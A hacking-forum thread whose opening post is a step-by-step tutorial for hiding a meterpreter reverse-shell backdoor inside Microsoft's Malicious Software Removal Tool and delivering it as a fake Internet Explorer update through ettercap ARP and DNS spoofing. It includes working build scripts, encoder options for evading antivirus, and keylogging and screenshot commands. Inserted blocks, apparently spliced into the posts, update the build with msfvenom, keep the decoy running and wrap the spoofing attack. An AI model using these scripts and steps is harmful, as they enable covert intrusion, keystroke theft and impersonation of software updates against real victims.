
Thread: covering up a meterpreter backdoor

  1. #1 LHYX1 (Senior Member, Belgium)

    covering up a meterpreter backdoor

    Hi everybody,

    Here is a tutorial on how to create an undetectable meterpreter backdoor and disguise it as an Internet Explorer security update. I created a very basic script that creates the meterpreter backdoor and starts the multi/handler.
    I will inject the payload into the Microsoft Windows Malicious Software Removal Tool, which is available for download here.

    Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)

    And I will use ettercap to dns_spoof the victim to the fake Internet Explorer security update page.

    Save my script as myscript.sh:
    Code:
    #!/bin/bash
    # builds a meterpreter reverse_tcp payload into a template exe and starts the handler
    clear
    cd /pentest/exploits/framework3 || exit 1
    echo "*************************************"
    echo "              creating a meterpreter backdoor          "
    echo "*************************************"
    echo -n "lhost ? "
    read lhost
    echo -n "lport ? "
    read lport
    echo -n "path to output file ? "
    read filename
    echo -n "path to input file ? "
    read originalfile
    echo "creating payload ..."
    # encode 10 times with shikata_ga_nai and inject the result into the template exe (-x) given as input file
    ./msfpayload windows/meterpreter/reverse_tcp LHOST="$lhost" LPORT="$lport" R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x "$originalfile" -o "$filename"
    echo "payload created !"
    echo "starting multi/handler ..."
    ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST="$lhost" LPORT="$lport" E
    Make my script executable:

    Code:
    chmod 755 myscript.sh
    Run my script:

    Code:
    ./myscript.sh
    lhost => your ip
    lport => 5555
    output => /root/backdoor.exe
    input => /root/windows-kb890830-v3.12
    Set up port forwarding:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    Set up etter.dns located in /usr/share/ettercap

    Code:
    nano /usr/share/ettercap/etter.dns
    Remove the part where microsoft is forwarded to linux and add these lines:

    Code:
    * A your ip
    *.* A your ip
    *.*.* A your ip
    *.*.*.* A your ip
    Create a webpage where you can download the file from, or send me a message and I will send you my webpage.

    I used Photoshop to edit some pictures I found regarding Internet Explorer,
    created a very simple HTML page and added a CSS style sheet to position the download button
    and to make the webpage look the same at every screen resolution.

    Copy all the files into your /var/www/ directory.
    Restart apache:

    Code:
    /etc/init.d/apache2 restart
    Activate the dns spoofing:

    Code:
    ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /victim ip/ /gateway ip/
    Gateway ip can be found by typing this from the terminal:

    Code:
    route -n
    Now we just have to wait for our victim to run the backdoor. When the victim runs the backdoor you should see something like "session 1 opened". You can see your active sessions by typing:

    Code:
    sessions -l
    You can jump into the first session by typing:
    Code:
    sessions -i 1
    Now there are a lot of commands you are able to execute. You can see them all by typing:
    Code:
    help
    A few examples:

    Code:
    sysinfo => get system info
    shell => jump into a cmd shell
    keyscan_start => scan for keyboard input
    keyscan_dump => dump keyboard input
    keyscan_stop => stop scanning
    screenshot => take screenshot
    upload
    download
    Last edited by LHYX1; 11-08-2010 at 07:19 PM.
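    The build step of the post above, as an added example that is neither the poster's script nor Metasploit's own code. It does what myscript.sh does but with msfvenom, which replaced msfpayload and msfencode in later Metasploit releases; it validates LHOST and LPORT before they reach any command, checks that the template really is a PE image, and passes -k so the Malicious Software Removal Tool keeps running while the payload starts in a new thread (without -k the disguised "update" does nothing visible, which is what gets it noticed). The handler is started with ExitOnSession false so it keeps listening after the first victim. Assumed: msfvenom and msfconsole are on PATH, the template is a 32-bit PE, and the file names in the usage comment are placeholders.

```sh
#!/bin/sh
# Added example, not the original poster's script. It rebuilds the first post's
# payload step with msfvenom (which replaced msfpayload/msfencode in Metasploit)
# and validates the operator's input before anything is executed.
# Assumed: msfvenom and msfconsole are on PATH; the template is a 32-bit PE file.

# Accept only a dotted quad with four octets in 0-255; anything else (including
# shell metacharacters typed at a prompt) is rejected before it reaches a command.
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS
    IFS=.
    set -- $1
    IFS=$oldifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# A TCP port is a plain integer in 1-65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# The template must be a PE image ("MZ" header) or msfvenom -x will refuse it.
is_pe_file() {
    [ -r "$1" ] && [ "$(dd if="$1" bs=2 count=1 2>/dev/null)" = "MZ" ]
}

# Print the exact msfvenom command line so it can be reviewed before it runs.
# -k keeps the template's own code running and starts the payload in a new
# thread; without it the fake "update" does nothing visible except call home.
build_cmd() {
    valid_ipv4 "$1" || { echo "bad LHOST: $1" >&2; return 1; }
    valid_port "$2" || { echo "bad LPORT: $2" >&2; return 1; }
    printf 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i %s -x %s -k -f exe -o %s\n' \
        "$1" "$2" "${5:-10}" "$3" "$4"
}

# Generate the binary, then start a background multi/handler that stays up
# after the first session (ExitOnSession false) so several victims can connect.
main() {
    lhost=$1; lport=$2; template=$3; out=$4
    is_pe_file "$template" || { echo "not a PE file: $template" >&2; exit 1; }
    cmd=$(build_cmd "$lhost" "$lport" "$template" "$out") || exit 1
    echo "running: $cmd"
    msfvenom -p windows/meterpreter/reverse_tcp "LHOST=$lhost" "LPORT=$lport" \
        -e x86/shikata_ga_nai -i 10 -x "$template" -k -f exe -o "$out" || exit 1
    msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST $lhost; set LPORT $lport; set ExitOnSession false; exploit -j"
}

# usage: sh build_backdoor.sh LHOST LPORT kb890830.exe backdoor.exe (placeholder names)
if [ "$#" -eq 4 ]; then
    main "$@"
fi
```

    The validation matters because the original script reads LHOST and LPORT straight from the terminal and splices them unquoted into a command line; a stray space or semicolon is enough to change what gets executed. Running the generated file through a current AV product before the engagement is still necessary: shikata_ga_nai iterations alone have not kept a meterpreter stub "undetectable" for many years.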

  2. #2 (rank: Just burned his ISO)

    Re: covering up a meterpreter backdoor

    Good tut.. just one thing..

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    isn't that packet forwarding, not port forwarding?

  3. #3 LHYX1 (Senior Member, Belgium)

    Re: covering up a meterpreter backdoor

    I think "echo 1 > /proc/sys/net/ipv4/ip_forward" actually enables portforwarding.

  4. #4 (rank: Just burned his ISO)

    Re: covering up a meterpreter backdoor

    The /etc/sysctl.conf file
    Code:
    #
    # /etc/sysctl.conf - Configuration file for setting system variables
    # See sysctl.conf (5) for information.
    #
    
    #kernel.domainname = example.com
    #net/ipv4/icmp_echo_ignore_broadcasts=1
    
    # the following stops low-level messages on console
    kernel.printk = 4 4 1 7
    
    ##############################################################3
    # Functions previously found in netbase
    #
    
    # Uncomment the next line to enable Spoof protection (reverse-path filter)
    #net.ipv4.conf.default.rp_filter=1
    
    # Uncomment the next line to enable TCP/IP SYN cookies
    #net.ipv4.tcp_syncookies=1
    
    # Uncomment the next line to enable packet forwarding for IPv4
    net.ipv4.conf.default.forwarding=1
    
    # Uncomment the next line to enable packet forwarding for IPv6
    #net.ipv6.conf.default.forwarding=1
    The last paragraph says packet forwarding.. if this parameter is changed then we don't have to do
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    again.
    So doesn't that mean it's packet forwarding?
    Also, if you are pentesting within a LAN you don't need port forwarding, right?

  5. #5 LHYX1 (Senior Member, Belgium)

    Re: covering up a meterpreter backdoor

    Yes, you are probably right. You forward the packets from the victim to the router, so it probably is packet forwarding. But I have followed some tutorials myself about ARP poisoning, and in most tutorials they say if ARP poisoning doesn't work you should try typing "echo 1 > /proc/sys/net/ipv4/ip_forward".
    So I don't really know the reason for using this command in a LAN. Like you say, you normally only use port forwarding if you are running servers behind a NAT or something like that.

  6. #6 (rank: Just burned his ISO)

    Re: covering up a meterpreter backdoor

    I think what we are doing is telling iptables not to drop packets that aren't meant for us. If we don't echo 1 > /proc/sys/net/ipv4/ip_forward, then iptables takes a look at the IP packet, sees an IP different from ours and so drops it.
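    The ip_forward question in replies #2 to #6, as an added example that comes from none of the posters. Two points settle it. First, it is the kernel's routing code, not iptables, that makes the decision: once ARP poisoning delivers the victim's frames to the attacker's MAC, a packet whose destination IP is not local is passed on only when net.ipv4.ip_forward is 1; at 0 the kernel discards it and the victim simply loses connectivity, which is noisy and is why tutorials about arpspoof and other tools that rely on the kernel to forward cure a "failed" ARP spoof with that echo (the iptables FORWARD chain is only traversed when forwarding is on). Second, ettercap is not such a tool: on start it turns the kernel flag off and forwards the packets in its own process, which is what lets dns_spoof rewrite replies on the way through, and restores the flag on exit (see the -u option in ettercap(8), which exists precisely to skip that). The script below records the flag, runs the first post's ettercap command (0.7-era target syntax, as posted), and verifies afterwards that the host was not left acting as a router; enable_forwarding is there for the arpspoof case. Every function takes an optional path so it can be exercised against a scratch file without root.

```sh
#!/bin/sh
# Added example (not from the thread): preflight and cleanup for the IPv4
# forwarding flag that an ARP-spoofing MITM depends on. Each function takes an
# optional path so it can be tested on a scratch file; the default is the real
# sysctl node.
FORWARD_NODE=/proc/sys/net/ipv4/ip_forward

# Print the current value (0 or 1) of the forwarding flag.
forwarding_value() {
    f=${1:-$FORWARD_NODE}
    [ -r "$f" ] || { echo "cannot read $f" >&2; return 1; }
    cat "$f"
}

# Succeed only when IPv4 forwarding is on.
forwarding_enabled() {
    [ "$(forwarding_value "${1:-$FORWARD_NODE}")" = 1 ]
}

# Turn forwarding on (root needed on the real node) and verify the write took.
# Needed for tools such as arpspoof that leave forwarding to the kernel.
enable_forwarding() {
    f=${1:-$FORWARD_NODE}
    forwarding_enabled "$f" && return 0
    echo 1 > "$f" || { echo "write to $f failed (are you root?)" >&2; return 1; }
    forwarding_enabled "$f"
}

# Put the flag back to the value recorded before the engagement, so the host is
# not left forwarding for the whole LAN after the tool exits.
restore_forwarding() {
    f=${1:-$FORWARD_NODE}
    echo "$2" > "$f" || return 1
    [ "$(forwarding_value "$f")" = "$2" ]
}

# Record the state, run the first post's ettercap command, then restore.
# ettercap sets the kernel flag to 0 itself and forwards in user space, so no
# enable_forwarding call is made here; the trap covers the case where ettercap
# is killed before it can restore the flag.
run_mitm() {
    iface=$1; victim=$2; gateway=$3
    saved=$(forwarding_value) || exit 1
    echo "ip_forward was $saved before the attack"
    trap 'restore_forwarding "$FORWARD_NODE" "$saved"' EXIT INT TERM
    ettercap -T -q -i "$iface" -P dns_spoof -M arp:remote "/$victim/" "/$gateway/"
    echo "ip_forward is now $(forwarding_value); restoring $saved"
}

# usage: sh mitm_preflight.sh eth0 VICTIM_IP GATEWAY_IP
if [ "$#" -eq 3 ]; then
    run_mitm "$@"
fi
```

    The value printed after ettercap exits is the check worth keeping: if it differs from the recorded one, something (a crash, a second tool, a persisted net.ipv4.conf.default.forwarding=1 like the sysctl.conf pasted in #4) is managing the flag behind your back, and the box will keep routing the victim's traffic after you have left.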
